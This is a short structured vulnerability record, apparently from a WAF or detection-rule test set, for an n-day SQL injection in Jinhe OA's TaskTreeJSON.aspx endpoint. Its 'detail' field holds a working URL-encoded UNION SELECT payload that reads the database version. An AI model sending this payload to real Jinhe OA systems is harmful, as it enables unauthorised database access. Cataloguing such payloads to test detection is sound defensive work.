vendor = "金和"
name = "金和OA SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/C6/JHSoft.Web.DailyTaskManage/TaskTreeJSON.aspx"
detail = "/C6/JHSoft.Web.DailyTaskManage/TaskTreeJSON.aspx/?id=1%27+union+all+select+null%2C%28select+@@VERSION%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--+"
fix = "缺省规则可检出"
date = "0701"
label = "nday"
verifier = "匿名"
